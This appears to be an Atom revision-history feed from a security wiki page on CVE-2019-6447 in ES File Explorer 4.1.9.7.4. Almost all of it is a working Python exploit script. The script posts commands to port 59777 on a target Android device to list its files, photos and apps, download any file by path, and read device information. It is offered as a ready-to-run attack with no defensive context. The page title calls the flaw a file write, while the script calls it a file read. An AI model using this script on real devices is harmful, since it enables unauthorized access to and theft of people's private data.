https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-6447_ES_File_Explorer_4.1.9.7.4_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%AF%AB%E5%85%A5%E6%BC%8F%E6%B4%9E
CVE-2019-6447 ES File Explorer 4.1.9.7.4 任意文件寫入漏洞 - Revision history
2026-04-14T05:35:07Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2019-6447_ES_File_Explorer_4.1.9.7.4_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%AF%AB%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=6048&oldid=prev
Pwnwiki: Marked this version for translation
2021-06-29T10:10:59Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 10:10, 29 June 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==影響版本==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==影響版本== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: ES File Explorer v4.1.9.7.4</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: ES File Explorer v4.1.9.7.4</div></td></tr>
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2019-6447_ES_File_Explorer_4.1.9.7.4_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%AF%AB%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=6047&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==影響版本== </translate> Version: ES File Explorer v4.1.9.7.4 ==EXP== <pre> # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read #..."
2021-06-29T10:10:13Z
<p>Created page with "<languages /> <translate> ==影響版本== </translate> Version: ES File Explorer v4.1.9.7.4 ==EXP== <pre> # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read #..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==影響版本==<br />
</translate><br />
Version: ES File Explorer v4.1.9.7.4<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read<br />
# Date: 29/06/2021<br />
# Exploit Author: Nehal Zaman<br />
# Version: ES File Explorer v4.1.9.7.4<br />
# Tested on: Android<br />
# CVE : CVE-2019-6447<br />
<br />
import requests<br />
import json<br />
import ast<br />
import sys<br />
<br />
if len(sys.argv) < 3:<br />
print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")<br />
sys.exit(1)<br />
<br />
url = 'http://' + sys.argv[2] + ':59777'<br />
cmd = sys.argv[1]<br />
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']<br />
listCmds = cmds[:9]<br />
if cmd not in cmds:<br />
print("[-] WRONG COMMAND!")<br />
print("Available commands : ")<br />
print(" listFiles : List all Files.")<br />
print(" listPics : List all Pictures.")<br />
print(" listVideos : List all videos.")<br />
print(" listAudios : List all audios.")<br />
print(" listApps : List Applications installed.")<br />
print(" listAppsSystem : List System apps.")<br />
print(" listAppsPhone : List Communication related apps.")<br />
print(" listAppsSdcard : List apps on the SDCard.")<br />
print(" listAppsAll : List all Application.")<br />
print(" getFile : Download a file.")<br />
print(" getDeviceInfo : Get device info.")<br />
sys.exit(1)<br />
<br />
print("\n==================================================================")<br />
print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")<br />
print("| Coded By : Nehal a.k.a PwnerSec |")<br />
print("==================================================================\n")<br />
<br />
header = {"Content-Type" : "application/json"}<br />
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}<br />
<br />
def httpPost(cmd):<br />
data = json.dumps({"command":cmd})<br />
response = requests.post(url, headers=header, data=data)<br />
return ast.literal_eval(response.text)<br />
<br />
def parse(text, keys):<br />
for dic in text:<br />
for key in keys:<br />
print(f"{key} : {dic[key]}")<br />
print('')<br />
<br />
def do_listing(cmd):<br />
response = httpPost(cmd)<br />
if len(response) == 0:<br />
keys = []<br />
else:<br />
keys = list(response[0].keys())<br />
parse(response, keys)<br />
<br />
if cmd in listCmds:<br />
do_listing(cmd)<br />
<br />
elif cmd == cmds[9]:<br />
if len(sys.argv) != 4:<br />
print("[+] Include file name to download.")<br />
sys.exit(1)<br />
elif sys.argv[3][0] != '/':<br />
print("[-] You need to provide full path of the file.")<br />
sys.exit(1)<br />
else:<br />
path = sys.argv[3]<br />
print("[+] Downloading file...")<br />
response = requests.get(url + path)<br />
with open('out.dat','wb') as wf:<br />
wf.write(response.content)<br />
print("[+] Done. Saved as `out.dat`.")<br />
<br />
elif cmd == cmds[10]:<br />
response = httpPost(cmd)<br />
keys = list(response.keys())<br />
for key in keys:<br />
print(f"{key} : {response[key]}")<br />
</pre></div>
Pwnwiki